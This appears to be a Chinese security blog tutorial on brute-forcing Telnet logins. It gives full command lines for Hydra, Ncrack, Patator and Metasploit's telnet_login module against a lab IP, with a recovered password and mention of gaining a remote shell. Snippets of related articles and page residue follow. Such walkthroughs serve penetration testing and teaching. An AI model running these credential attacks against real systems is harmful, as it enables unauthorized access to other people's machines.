<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    破解Telnet的四種方法

    VSole2023-02-06 14:18:42

    1. Hydra

    Hydra 通常是首選工具。它可以對 50 多種協議執行快速字典攻擊,包括 telnet、ftp、http、https、smb、多個數據庫等等

    現在,我們需要選擇一個單詞列表。與任何字典攻擊一樣,詞表是關鍵。Kali 內置了許多單詞表。

    運行以下命令

    hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.106 telnet
    
    -L:表示用戶名列表的路徑
    -P:表示密碼列表的路徑
    如圖所見,我們已成功獲取 Telnet用戶名xander和密碼123。

    2. Ncrack

    Ncrack是一款高速網絡認證破解工具。它旨在通過主動測試其所有主機和網絡設備的密碼錯誤來幫助公司保護其網絡。

    運行以下命令

    ncrack -U /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.106:23
    
    -U:表示用戶名列表的路徑
    -P:表示密碼列表的路徑

    如圖所見,我們已成功獲取 Telnet用戶名xander和密碼123。

    3. Patator

    Patator 是一個多用途的暴力破解工具,具有模塊化設計和靈活的使用方式。它對于對 FTP、HTTP、SMB 等多個端口進行暴力攻擊非常有用。

    patator telnet_login host=192.168.1.106 inputs='FILE0FILE1' 0=/root/Desktop/user.txt 1=/root/Desktop/pass.txt persistent=0 prompt_re='Username: | Password:'
    

    從下面給出的圖像中,可以觀察到字典攻擊的過程開始了,因此將獲得受害者的用戶名和密碼。

    4. Metasploit

    該模塊將在一系列機器上測試 telnet 登錄并報告成功登錄。如果已加載數據庫插件并連接到數據庫,此模塊將記錄成功的登錄和主機,以便可以跟蹤訪問。

    打開 Kali 終端類型 msfconsole 現在類型

    use auxiliary/scanner/telnet/telnet_loginmsf exploit (telnet_login)>set rhosts 192.168.1.106 (遠程主機IP)msf exploit (telnet_login)>set user_file /root/Desktop/user txtmsf exploit (telnet_login)>set pass_file /root/Desktop/pass.txtmsf exploit (telnet_login)>set stop_on_success truemsf exploit (telnet_login)> exploit
    從下圖可以看出,我們已經成功獲取了 telnet 密碼和用戶名,此外,Metasploit 還提供了一個額外的好處,即提供遠程系統命令 shell以未經授權訪問受害者的系統。
    


    用戶名telnet
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    破解Telnet的四種方法
    2023-02-06 14:18:42
    它可以對 50 多種協議執行快速字典攻擊,包括 telnet、ftp、http、https、smb、多個數據庫等等現在,我們需要選擇一個單詞列表。與任何字典攻擊一樣,詞表是關鍵。Kali 內置了許多單詞表。-L:表示用戶名列表的路徑-P:表示密碼列表的路徑如圖所見,我們已成功獲取 Telnet用戶名xander和密碼123。從下圖可以看出,我們已經成功獲取了 telnet 密碼和用戶名,此外,Metasploit 還提供了一個額外的好處,即提供遠程系統命令 shell以未經授權訪問受害者的系統。
    通過文件搜索,可以定位到jhttpd。對于get請求則讓httpd_dowith_get函數去處理。了解了該程序的http服務大概的流程,接下來就是分析哪個請求的處理存在問題即可。
    會話認證支持 SSH 自動執行。支持 XModem、YModem 和 ZModem。集成本地文件管理器,支持移動到、復制到、刪除、重命名、新建文件/目錄等。
    SSH協議通過對網絡數據進行加密和驗證,在不安全的網絡環境中提供了安全的登錄和其他安全網絡服務。作為Telnet和其他不安全遠程shell協議的安全替代方案,目前SSH協議已經被全世界廣泛使用,大多數設備都支持SSH功能。用戶認證SSH客戶端向服務器端發起認證請求,服務器端對客戶端進行認證。非對稱加密的發送和接收需要使用一對關聯的SSH密鑰,公鑰和私鑰。
    報告分析了一系列企業IT環境,基于開放端口和敏感協議暴露情況對網絡安全狀況進行基準測試。
    SSH協議通過對網絡數據進行加密和驗證,在不安全的網絡環境中提供了安全的登錄和其他安全網絡服務。作為Telnet和其他不安全遠程shell協議的安全替代方案,目前SSH協議已經被全世界廣泛使用,大多數設備都支持SSH功能。用戶認證SSH客戶端向服務器端發起認證請求,服務器端對客戶端進行認證。非對稱加密的發送和接收需要使用一對關聯的SSH密鑰,公鑰和私鑰。
    0x10 前言對前一段時間發現的幾個命令注入漏洞做下記錄:CVE-2022-28571 && CVE-2022-28572 CVE-2022-28571 這個漏洞的產生是因為Telnetd參數過濾不完整導致的,由于需要知道密碼所以比較雞肋,類似于授權后的命令注入,發現的過程很有意思,這篇文章主要介紹這個漏洞。
    ◆含有passwd和pwd相關的文件中,可以看到嵌入式web服務httpd,部分htm文件以及其他配置文件。啟動項中未見異常行為,httpd文件在firmwalker掃描的敏感信息和啟動項中都有涉,因此需要用IDA分析一下該文件。通過IDA中字符串搜索發現疑似后門的敏感字符。根據此處的偽代碼可推斷出函數httpRpmConfAdd的功能是綁定URL和執行的函數。由函數名httpDebugInit可推斷出這是一個調試后門。使用FirmAE來對固件進行模擬以驗證上述內容。
    hydra是著名組織thc的一款開源的暴力破解密碼工具、功能非常強大kali下是默認安裝的、幾乎支持所有協議的在線破解。密碼能否破解,在于字典是否強大以及電腦的性能。Windows中Hydra安裝:Hydra官方不支持Windows版,需要在GitHub上下載,地址為:https://github.com/maaaaz/thc-hydra-windows下載之后解壓縮即可。-o file 指定結果輸出文件-f 找到第一對登錄名或者密碼的時候中止破解。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类